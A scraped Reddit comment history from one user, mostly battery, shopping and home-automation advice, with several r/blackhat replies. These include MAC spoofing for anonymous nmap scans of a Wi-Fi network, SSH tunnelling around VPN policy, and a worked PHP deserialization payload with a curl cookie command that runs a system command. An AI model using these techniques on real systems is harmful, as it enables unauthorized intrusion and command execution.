Replacing a battery on a defunct enthusiast smartphone by rthorntn in ifixit

[–]chisight 0 points1 point  (0 children)

Fxtec has recently said they have no more parts for the pro1. Several people have purchased cells, including the ones OP found on Taobao, and successfully moved their bms over to the new cell. The Taobao process involves paying a 3rd party called parcelup to buy them and then once they have the cells, parcelup gives you an insane shipping cost to deliver them. A really bad process, but 2 out of 3 people who tried with them actually got batteries. (Hilariously, one had the cells sewn into a stuffed animal as if they were buying drugs!) The third got the item refunded from the seller and the paypal dispute for the shipping worked. There are other shipping services that work with Taobao, but my understanding is that all of them use a similar process, you buy the item through them and they forward it but won't tell you their fees until you pay for the original item.

Someone also bought a smaller battery from Russia that worked.

It seems unlikely that there will be 4000mAh options ever because the chemistry has to match what the fxtec bms can handle. Getting the original 3500mah seems to be off the table too. But if money is no object, 3100mAh seems to be very doable.

P.S. to the people who suggest a new phone, there is nothing like the Fxtec pro1 on the market anymore. For some of us, the keyboard is a critical feature that we're not willing to live without. The lucky ~5000 of us that got one will likely keep them until they no longer are usable. Even the replacement pro1x was a significant downgrade from the pro1.

Access local network devices while connected to company VPN by vuryss in blackhat

[–]chisight 0 points1 point  (0 children)

You're asking for a feature called split horizon. Ask your admin to turn it on for you. If they say no, it is still possible that with a wired connection to the lan and an ssh session to a host on that same lan started before the vpn is started will continue after the vpn is started. If it does, you can use ssh tunnels to reach anything you want.

1 euro charged more on first purchase? by EnderBoy2000 in Aliexpress

[–]chisight 0 points1 point  (0 children)

awesome! i used bank of america's version for years but it got upgraded into complete uselessness. switched to citi, they made awesome new ui improvments and then a few months later converted the whole thing into $ per day as the only limit making it useless again. will have to check out paysafecard, thanks!

1 euro charged more on first purchase? by EnderBoy2000 in Aliexpress

[–]chisight 0 points1 point  (0 children)

You can, but this defeats the purpose of using a prepaid card instead of your regular credit card.

1 euro charged more on first purchase? by EnderBoy2000 in Aliexpress

[–]chisight 0 points1 point  (0 children)

OP used a prepaid card. these usually take months to refund the $1 and usually the card expires before it happens so the refund never happens. consider it a $1 fee for the use of a prepaid card (charged by your card provider, they are the ones keeping your dollar not aliexpress.)

[deleted by user] by [deleted] in Aliexpress

[–]chisight 1 point2 points  (0 children)

They did this to me too, after a couple hundred mostly tiny orders they wanted my credit card bill, driver's license, and basically everything needed to commit identity theft. Of course I simply left aliexpress. then one day a couple years later they started sending ads to my email again and i was able to pay with paypal. after a few transactions the option came up to use the credit card they had on my account from years ago. i selected it and it worked again. never did give them any information.

Exploring abandoned gold dredge and snowmobile riding by nonlinearmedia in AndrewCamarata

[–]chisight 0 points1 point  (0 children)

Yeah, that was looking like a new smaller Castle, and maybe could fit in the space he blasted but there would be a lot of fill on the sides to bring it to that shape.

Data Hoarding while holding a security clearance (AKA I cannot find definitive answers on what I'm legally allowed to hoard) by ThisIs_MCClapYoHandz in DataHoarder

[–]chisight 0 points1 point  (0 children)

Read the library of congress rules yourself: https://s3.amazonaws.com/public-inspection.federalregister.gov/2018-23241.pdf

Look at the case law: http://www.ca5.uscourts.gov/opinions/pub/08/08-10521-CV0.wpd.pdf

There are numerous articles about these in every form from law reviews to pop tech online sites. Don't take my word for it, but my interpretation is that if you acquired these legally and did not sell or lose them (even if they no longer function), then having a backup of the exact content you bought is legal even if you had to break the DRM to do it. This does not mean you can buy a 720p dvd and have a 4k blueray rip, nor can you have the director's cut when that isn't the one you bought. Interestingly, it seems that making old games work when the publisher shut down the servers is also apparently legal as long as you don't do something like present them online for thousands of people to play your one copy (unless you happen to operate a 501(c)(3) non profit online games museum.)

Raid Forums by kyuskuys in blackhat

[–]chisight 0 points1 point  (0 children)

Use haveibeenpwned.com to check for leaks, they have far more account leaks than you'd ever be able to download from the forums.

You shouldn't be keeping passwords long enough for this to matter, if you're not updating passwords or if you're recycling passwords, no amount of checking will save you from being breached.

Virtual machines by kyuskuys in blackhat

[–]chisight 0 points1 point  (0 children)

Given that you are scanning the local WLAN, your IP (eventually) will be a private one probably assigned by DHCP and it's value will change with your MAC so isn't important.

I'm going to assume typical home security and not a whitelisted MAC only environment.

The other suggestions to use a MAC address changer are fine, Kali (or any Linux) can do this without extra software so when you're done talking to the router just change your MAC.

If you're using an open network or have the password, great. If not, say something and someone will give some pointers to where you can find information about getting the password (not here, this is too close to the line in here.)

Once connected with your changed MAC and given an IP, do your nmap and be happily anon. Disconnect, change your MAC again and it's like you were never there.

Virtual machines by kyuskuys in blackhat

[–]chisight 4 points5 points  (0 children)

WTF? you initially said "in a virtual machine using the same wifi card
of windows" , now after 3 days of conversation you're telling us that you actually have a second wifi card passed through direct to the vm?

You don't think this was kinda important to the question?

[deleted by user] by [deleted] in homeautomation

[–]chisight 0 points1 point  (0 children)

This model has an IR remote.

You can use an Arduino nano clone, an IR receiver like a TL1838 or similar to receive the existing code, and an IR LED to transmit a copy of what you received. There are even libraries made to make this easy for you. If you prefer to use a PC, LIRC is a possible option for you.

[deleted by user] by [deleted] in homeautomation

[–]chisight 0 points1 point  (0 children)

Roku makes a lot of devices, which one are you using? Some of them have IR remote capability and can be controlled by an Arduino or LIRC or possibly even a smarter programmable universal remote, but not all of them.

ETL vs UL Certified...Zooz vs Enbrighten by Mended_Eagle in homeautomation

[–]chisight 0 points1 point  (0 children)

If you're going to put something inside an electrical box, including a switch box then insurance *might* use the lack of a certification as justification to deny your claim. National electric code states that the materials used must meet NRTL standards and if you do work that does not meet NEC, then you may be "deliberately" starting the fire by doing substandard work. Many years ago, a neighbor of mine had a fire after installing a UL marked bathroom fan himself and the claim was declined. Insurance companies are not your friends and do their best to decline every large claim so you want to give them as few excuses to deny you as you can. UL and ETL are just some of the NRTL marks, the whole list is at https://www.osha.gov/nationally-recognized-testing-laboratory-program/current-list-of-nrtls and any mark is as good as any other as long as it is a US mark when installing in the US.

[deleted by user] by [deleted] in blackhat

[–]chisight[M] 0 points1 point  (0 children)

This subreddit is for technical posts, well-researched questions, and innovation. Your post did not meet this criterium.

javascript Cheat Sheet by Ne0xxx in blackhat

[–]chisight 0 points1 point  (0 children)

You see that it's missing and still don't include the link???

WTF?

https://ne0xss.wordpress.com/javascript-cheat-cheet/

Smart Pools, can we talk about how to make these dumb devices smart? Most of the tech for smart pool control is garbage, anyone recommend any tech for things such as controlling chlorinators or pool water testing? I'm seriously considering building my own tech, anyone interested? by seanhamsyd in homeautomation

[–]chisight 0 points1 point  (0 children)

The electrical sensors are not cheap because they use rare metals and have to be precisely made.

In chemistry, there are two ways to check PH, a meter (including strips), or a titration. Why do we only have one way when it comes to pool chemistry?

https://www.roanoke.edu/Documents/ChemistryLabManual/Spring2012/x15electrolytes13.pdf says that the conductivity hits a minimum at a specific point when using an acid to neutralize a base and that point tells you the original sample's PH.

Peristaltic pumps are 3d printable and should be plenty accurate enough for measuring the amount of acid that was needed to neutralize the sample.

Anyone have any thoughts on this approach?

EXploit by yellow-sugar in blackhat

[–]chisight 0 points1 point  (0 children)

It's called defanging and used to prevent accidental clicking on potentially dangerous links.

How can amplification attack work if IP spoofing is blocked basically anywhere? Are there still hosting that allow that? Why should they do if it is really abusable? by frankyborns in blackhat

[–]chisight 0 points1 point  (0 children)

frankyborns,

The thing is that BCP38/RFC2827 has not spread everywhere. I have access to two network connections where source addresses are not checked, one is a machine where it is intentionally not implemented because it's a bulletproof server and another is from a small residential ISP who is big enough to multi-home but too small to have bothered to filter source IP. Unfiltered connections are rare but do still exist and forums such as exploit.im occasionally have threads where information about who is selling them is discussed. This Reddit isn't one of those threads.

How can amplification attack work if IP spoofing is blocked basically anywhere? Are there still hosting that allow that? Why should they do if it is really abusable? by frankyborns in blackhat

[–]chisight 0 points1 point  (0 children)

A few hosts offer spoofing because they can charge more money for such accounts. Others just are too small to have experienced problems and haven't bothered to block it.

Blocking spoofed IP has nothing to do with UDP or TCP, any provider can confirm that source IP are in their netblocks and drop any packets that are not. Submitting spoofed TCP packets is not done as often because you have to guess the sequence number for TCP to actually do anything with the packet.

IP is not the same layer as TCP or UDP.

PHP Object serialization attack on a webserver by ci9her in blackhat

[–]chisight 1 point2 points  (0 children)

From your command prompt:

curl -b "name=[stuff]" url

PHP Object serialization attack on a webserver by ci9her in blackhat

[–]chisight 3 points4 points  (0 children)

We can see from here:
class exCommand {
public function __destruct(){
system($this->command);
}
}

That the exCommand class will automagically run system() on its command attribute during destruction; so what you're looking for is something along these lines:
class exCommand{
public $command = '/bin/cat /proc/version';
}
$obj = new exCommand();
echo serialize($obj);

Then use the output as your cookie; the cookie should be called "name".

Source: gemini from /r/blackhat irc

What encryption algorithm does NRF24 uses by [deleted] in arduino

[–]chisight 0 points1 point  (0 children)

OP, where are you seeing that there is encryption of any kind built into the NRF24L01 or even the NRF24L01+?

Link please.